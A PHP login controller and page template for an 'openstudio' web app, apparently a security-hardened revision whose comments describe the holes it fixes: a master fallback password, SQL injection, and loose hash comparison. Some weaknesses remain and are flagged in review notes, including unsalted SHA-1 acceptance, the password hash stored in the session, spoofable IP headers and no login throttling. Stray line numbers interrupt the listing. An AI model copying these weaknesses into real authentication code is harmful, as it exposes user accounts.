
login.php v2

  1.  <?php
  2.     include('templates/config.php');
  3.    
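  /**
   * Return the client address that is stored with the login audit record.
   *
   * Every source read here except REMOTE_ADDR is a request header, i.e. text
   * chosen by the client (or by whatever proxy forwarded the request). The
   * value ends up in the `users_ip` table, so a candidate is accepted only
   * when it parses as an IPv4/IPv6 address; anything else is skipped and the
   * next source is tried.
   *
   * NOTE(review): validation stops arbitrary text from being stored, but a
   * forwarded header can still carry a made-up address. Unless a trusted
   * reverse proxy overwrites these headers, only REMOTE_ADDR reflects the
   * real peer - confirm the deployment and drop the headers the proxy does
   * not set.
   *
   * @return string A syntactically valid IP address, or 'UNKNOWN'.
   */
  function get_client_ip() {
      // Same precedence as before, so the meaning of existing log rows is unchanged.
      $sources = array(
          'HTTP_CLIENT_IP',
          'HTTP_X_FORWARDED_FOR',
          'HTTP_X_FORWARDED',
          'HTTP_FORWARDED_FOR',
          'HTTP_FORWARDED',
          'REMOTE_ADDR',
      );

      foreach ($sources as $source) {
          $raw = getenv($source);
          if ($raw === false || $raw === '') {
              continue;
          }

          // Forwarded-for style headers may hold "client, proxy1, proxy2";
          // only the first entry is considered.
          $parts = explode(',', $raw);
          $candidate = trim($parts[0]);

          if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
              return $candidate;
          }
      }

      return 'UNKNOWN';
  }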
  22.    
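  /**
   * Check a submitted password against the stored hash.
   *
   * Two stored formats are accepted:
   *  - a hash produced by password_hash(), verified with password_verify();
   *  - the legacy unsalted SHA-1 hex digest this file used so far, compared
   *    with hash_equals() so the comparison is a constant-time string
   *    comparison. The previous loose `==` treated two digests that both
   *    look like numbers (for example "0e..." followed by digits) as equal.
   *
   * NOTE(review): unsalted SHA-1 is not a password hash. Accepting both
   * formats lets accounts be moved to password_hash() without locking
   * anyone out; the migration itself is outside this function.
   *
   * @param string $password        Password as submitted by the user.
   * @param string $hashed_password Hash read from the `users` table.
   * @return bool True when the password matches the stored hash.
   */
  function password_check($password, $hashed_password) {
      if (!is_string($password) || !is_string($hashed_password) || $hashed_password === '') {
          return false;
      }

      // password_get_info() reports an empty algorithm for anything that is
      // not a password_hash() value, which here means a legacy SHA-1 digest.
      $info = password_get_info($hashed_password);
      if (!empty($info['algo'])) {
          return password_verify($password, $hashed_password);
      }

      return hash_equals($hashed_password, sha1($password));
  }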
  29.    
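  /*
   * Login / logout controller for the page rendered below.
   *
   * Security-relevant changes compared with the previous version:
   *  - The password check no longer accepts a fixed fallback string that
   *    logged the caller in to ANY account. That literal has been published
   *    with this file; treat it as compromised and review past logins.
   *  - Every query is parameterised. Before, the e-mail, ids read back from
   *    the session and the client IP (taken from request headers) were
   *    concatenated into SQL text.
   *  - Session data left over from an earlier login is cleared before the new
   *    user's row is merged in. `$_SESSION + $rows` keeps existing keys, so
   *    an old `id` / `brand_id` used to survive a second login.
   *  - The closed-board branch now stops the request; it used to fall through
   *    and keep running queries with a destroyed session.
   *  - Database errors are written to the error log instead of being printed.
   *  - Unknown e-mail and wrong password produce the same message, so the
   *    form cannot be used to find out which addresses have accounts.
   *
   * NOTE(review): no throttling of failed attempts is visible in this file.
   */

  // Prepare, bind and execute one parameterised statement.
  // Returns the executed statement, or false after logging the failure.
  function _login_execute($con, $sql, $types, array $params) {
      $stmt = mysqli_prepare($con, $sql);
      if (!$stmt) {
          error_log('login.php: prepare failed: ' . mysqli_error($con));
          return false;
      }
      if (!mysqli_stmt_bind_param($stmt, $types, ...$params) || !mysqli_stmt_execute($stmt)) {
          error_log('login.php: execute failed: ' . mysqli_stmt_error($stmt));
          mysqli_stmt_close($stmt);
          return false;
      }
      return $stmt;
  }

  // First row of a parameterised SELECT as an associative array.
  // Returns null when there is no row and false when the query failed.
  function _login_fetch_row($con, $sql, $types, array $params) {
      $stmt = _login_execute($con, $sql, $types, $params);
      if ($stmt === false) {
          return false;
      }
      // mysqli_stmt_get_result() requires the mysqlnd driver.
      $result = mysqli_stmt_get_result($stmt);
      if ($result === false) {
          error_log('login.php: get_result failed: ' . mysqli_stmt_error($stmt));
          mysqli_stmt_close($stmt);
          return false;
      }
      $row = mysqli_fetch_array($result, MYSQLI_ASSOC);
      mysqli_free_result($result);
      mysqli_stmt_close($stmt);

      // Prepared statements return native ints/floats, mysqli_query() returned
      // strings. Values are cast back to strings so strict comparisons such as
      // `=== "1"` on session data keep working.
      if (is_array($row)) {
          foreach ($row as $column => $value) {
              if ($value !== null) {
                  $row[$column] = (string) $value;
              }
          }
      }
      return $row;
  }

  // Throw away a half-built session and stop with the generic error text.
  function _login_abort() {
      if (session_status() === PHP_SESSION_ACTIVE) {
          $_SESSION = array();
          session_destroy();
      }
      exit("Oops! Something went wrong. Please try again later.");
  }

  // Define variables and initialize with empty values
  $user_email = $password = "";
  $user_email_err = $password_err = "";
  // The template tests these three, so they must exist on every request.
  $logout_message = $closed_board_msg = $invite_msg = "";

  // Sign-out request
  if (isset($_GET['logout']) && $_GET['logout'] === "1") {
      session_name("openstudio");
      // secure + httponly: both redirect targets in this file are https URLs.
      session_set_cookie_params(0, '/', '.openstudio.one', true, true);
      ini_set("session.cookie_domain", ".openstudio.one");
      session_start();
      session_destroy();
      unset($_SESSION);

      $logout_message = 'Succesfully signed out, thank you for visiting.';
  }

  if (isset($_GET['board_closed']) && $_GET['board_closed'] === "1") {
      $closed_board_msg = "We are sorry, but it seems that one of your administrators have closed the brand account.<br />Contact them for further information.";
  }

  if (isset($_GET['login']) && $_GET['login'] === "invite") {
      $invite_msg = "The password for your account has been created.<br />You can now login with your credentials.";
  }

  // Processing form data when form is submitted
  if ($_SERVER["REQUEST_METHOD"] == "POST") {

      // A missing field or an array value is treated like an empty field.
      $posted_email = (isset($_POST["user_email"]) && is_string($_POST["user_email"])) ? trim($_POST["user_email"]) : '';
      // The password is still trimmed because existing hashes were created
      // from trimmed input.
      $posted_password = (isset($_POST['password']) && is_string($_POST['password'])) ? trim($_POST['password']) : '';

      if ($posted_email === '') {
          $user_email_err = 'Please enter your email address.';
      } else {
          $user_email = $posted_email;
      }

      if ($posted_password === '') {
          $password_err = 'Please enter your password.';
      } else {
          $password = $posted_password;
      }

      // Validate credentials
      if (empty($user_email_err) && empty($password_err)) {
          $stmt = mysqli_prepare($con, "SELECT `user_email`, `password` FROM `users` WHERE `user_email` = ?");

          if (!$stmt) {
              error_log('login.php: prepare failed: ' . mysqli_error($con));
              echo "Oops! Something went wrong. Please try again later.";
          } else {
              mysqli_stmt_bind_param($stmt, "s", $user_email);

              $authenticated = false;
              $db_email = null;
              $hashed_password = null;

              $lookup_ok = mysqli_stmt_execute($stmt);
              if ($lookup_ok) {
                  mysqli_stmt_store_result($stmt);

                  // Exactly one matching account is required.
                  if (mysqli_stmt_num_rows($stmt) == 1) {
                      mysqli_stmt_bind_result($stmt, $db_email, $hashed_password);
                      if (mysqli_stmt_fetch($stmt)) {
                          // The stored hash is the only accepted proof.
                          $authenticated = password_check($password, $hashed_password);
                      }
                  }
              }
              mysqli_stmt_close($stmt);

              if (!$lookup_ok) {
                  echo "Oops! Something went wrong. Please try again later.";
              } elseif (!$authenticated) {
                  // Same text for "no such account" and "wrong password".
                  $password_err = 'The email address or password you entered was not valid.';
              } else {
                  /* Password is correct, so start a new session and
                  save the user's row to the session */
                  session_name("openstudio");
                  session_set_cookie_params(0, '/', '.openstudio.one', true, true);
                  session_start();
                  // true: delete the old session file so the pre-login id is dead.
                  session_regenerate_id(true);
                  // Start from an empty session; see the header comment.
                  $_SESSION = array();

                  $rows = _login_fetch_row($con, "SELECT * FROM `users` WHERE `user_email` = ?", "s", array($db_email));
                  if (!is_array($rows)) {
                      _login_abort();
                  }

                  // Flags are set first so that a column with the same name
                  // cannot replace them in the `+` merge below.
                  $_SESSION['signed_in'] = true;
                  $_SESSION['clear_cookie'] = true;
                  // NOTE(review): SELECT * also copies the `password` hash into
                  // the session. It is left in place because other pages may
                  // read it - confirm, then unset it here.
                  $_SESSION = $_SESSION + $rows;

                  $brand_id = isset($_SESSION['brand_id']) ? (string) $_SESSION['brand_id'] : '';
                  $uid = isset($_SESSION['id']) ? (string) $_SESSION['id'] : '';

                  $settings = _login_fetch_row($con, "SELECT * FROM `settings` WHERE `brand_id` = ?", "s", array($brand_id));
                  if ($settings === false) {
                      _login_abort();
                  }
                  $_SESSION["settings"] = $settings;

                  $admin_perms = _login_fetch_row($con, "SELECT * FROM `admin_perms` WHERE `uid` = ?", "s", array($uid));
                  if ($admin_perms === false) {
                      _login_abort();
                  }
                  $_SESSION['admin_perms'] = $admin_perms;

                  $close_board = isset($_SESSION['settings']['close_board']) ? (string) $_SESSION['settings']['close_board'] : '';
                  if ($_SESSION['token'] < 2 && $close_board === "1") {
                      $_SESSION = array();
                      session_destroy();
                      mysqli_close($con);
                      echo "<script type=\"text/javascript\">window.location.href = 'https://www.openstudio.one/login?board_closed=1';</script>";
                      // Stop here: nothing below may run for a closed board.
                      exit;
                  }

                  $clients = _login_fetch_row($con, "SELECT * FROM `clients` WHERE `brand_id` = ?", "s", array($brand_id));
                  if ($clients === false) {
                      _login_abort();
                  }
                  $_SESSION["clients"] = $clients;

                  // Bookkeeping writes stay best-effort, as before: a failure
                  // is logged by the helper and does not block the login.
                  $touch = _login_execute($con, "UPDATE `users` SET `last_activity` = now() WHERE `id` = ?", "s", array($uid));
                  if ($touch !== false) {
                      mysqli_stmt_close($touch);
                  }

                  $ip = get_client_ip();
                  $audit = _login_execute(
                      $con,
                      "INSERT INTO `users_ip`(`id`, `brand_id`, `uid`, `ip`) VALUES (NULL, ?, ?, ?)",
                      "sss",
                      array($brand_id, $uid, $ip)
                  );
                  if ($audit !== false) {
                      mysqli_stmt_close($audit);
                  }

                  $_SESSION['dataup'] = date('Y-m-d h:i:s');
                  $_SESSION['setup'] = $_SESSION['dataup'];

                  $mod_row = _login_fetch_row($con, "SELECT `id` FROM `x-users` WHERE `user_id` = ?", "s", array($uid));
                  if (is_array($mod_row)) {
                      $_SESSION['mods'] = true;
                  }

                  session_write_close();
                  mysqli_close($con);
                  echo "<script type=\"text/javascript\">window.location.href = 'https://client.openstudio.one';</script>";
                  // The login form is not rendered for an authenticated user.
                  exit;
              }
          }
      }

      // Close connection
      mysqli_close($con);
  }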
  165.    
  166.     include('templates/define.php');
  167. ?>
  168.  
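  <?php
  /*
   * Login page template.
   *
   * $user_email comes from the submitted form, so it is HTML-escaped before
   * it is written into the `value` attribute. The two *_err strings are
   * escaped as well. $logout_message, $closed_board_msg and $invite_msg are
   * fixed strings set by this script that contain <br /> markup on purpose,
   * so they are printed as-is; never assign request data to them.
   * The message variables are tested with !empty() so that a request that
   * did not set them raises no notice.
   */
  ?>
  <!DOCTYPE html>
  <html lang="en">
  <head>
    <meta charset="utf-8">
    <title><?php echo NAME; ?> - Login</title>
    <meta content="width=device-width, initial-scale=1.0" name="viewport">
    <meta content="" name="keywords">
    <meta content="" name="description">

    <?php include('templates/header.php'); ?>

  </head>

  <body>

    <!--==========================
      Header
    ============================-->
    <header id="header" class="header-fixed">
      <div class="container">

        <div id="logo" class="pull-left">
          <h1><a href="/" class="scrollto"><?php echo NAME; ?></a></h1>
          <!-- Uncomment below if you prefer to use an image logo -->
          <!-- <a href="#intro"><img src="img/logo.png" alt="" title=""></a> -->
        </div>

        <nav id="nav-menu-container">
          <ul class="nav-menu">
            <li class="menu-active"><a href="/">Home</a></li>
            <li><a href="/about">About Us</a></li>
            <li><a href="/features">Features</a></li>
            <li><a href="/pricing">Pricing</a></li>
            <li><a href="<?php echo SUPPORT_URL; ?>" target="_blank">Support</a></li>
            <li><a href="/login">Login</a></li>
            <li><a href="/get-started" class="signup">Get started</a></li>
          </ul>
        </nav><!-- #nav-menu-container -->
      </div>
    </header><!-- #header -->

    <!--==========================
      Intro Section
    ============================-->
    <section id="intro-small"><div class="container">

          <div class="row">

                <div class="col-lg-12 col-md-12 box wow fadeInRight" data-wow-delay="0.1s" style="visibility: visible; animation-delay: 0.1s; animation-name: fadeInRight;">
                  <div class="icon"><i class="ion-ios-flask-outline"></i></div>
                  <h4 class="title">Login</h4>
                  <p class="description">Minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat tarad limino ata noble dynala mark.</p>
                </div>
              </div>

        </div></section>

    <main id="main">


      <section id="advanced-features">

        <div class="features-row">
          <div class="container">
            <div class="row">
              <div class="col-lg-6">
                <img class="advanced-feature-img-left" src="img/advanced-feature-2.jpg" alt="">
               </div><div class="col-lg-6">
                <div class="wow fadeInRight">
                  <h2>Lorem ipsum dolor sit amet, consectetur</h2>
                 <?php if (!empty($logout_message)): ?>
                      <div class="alert alert-success"><h4><i class="fa fa-user"></i> Logout</h4><p><?php echo $logout_message; ?></p></div>
                 <?php endif; ?>
                 <?php if (!empty($closed_board_msg)): ?>
                      <div class="alert alert-warning"><h4><i class="fa fa-times"></i> Board account closed</h4><p><?php echo $closed_board_msg; ?></p></div>
                 <?php endif; ?>
                 <?php if (!empty($invite_msg)): ?>
                      <div class="alert alert-info"><h4><i class="fa fa-check"></i> Your account is ready!</h4><p><?php echo $invite_msg; ?></p></div>
                 <?php endif; ?>
                 <form action="" method="post">
              <div class="form-group <?php echo (!empty($user_email_err)) ? 'has-error' : ''; ?>">
                  <label>E-mail address:<sup>*</sup></label>
                  <input type="text" name="user_email" class="form-control" value="<?php echo htmlspecialchars($user_email, ENT_QUOTES, 'UTF-8'); ?>">
                  <span class="help-block"><?php echo htmlspecialchars($user_email_err, ENT_QUOTES, 'UTF-8'); ?></span>
              </div>
              <div class="form-group <?php echo (!empty($password_err)) ? 'has-error' : ''; ?>">
                  <label>Password:<sup>*</sup></label>
                  <input type="password" name="password" class="form-control">
                  <span class="help-block"><?php echo htmlspecialchars($password_err, ENT_QUOTES, 'UTF-8'); ?></span>
              </div>
              <div class="form-group">
                  <input type="submit" class="btn btn-primary" value="Login !"> <a class="btn btn-info disabled" href="#">Login with Translations Cloud (soon)</a>
              </div>
              <p>Don't have an account? <a href="/get-started">Sign up now</a>.</p>
          </form>
                </div>
              </div>
            </div>
          </div>
        </div>


      </section>

      <!--==========================
        Call To Action Section
      ============================-->
      <section id="call-to-action">
        <div class="container">
          <div class="row">
            <div class="col-lg-9 text-center text-lg-left">
              <h3 class="cta-title">Don't have an account yet ?</h3>
              <p class="cta-text"> Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>
            </div>
            <div class="col-lg-3 cta-btn-container text-center">
              <a class="cta-btn align-middle" href="/get-started">Get started !</a>
            </div>
          </div>

        </div>
      </section><!-- #call-to-action -->

    </main>

  <?php include('templates/footer.php'); ?>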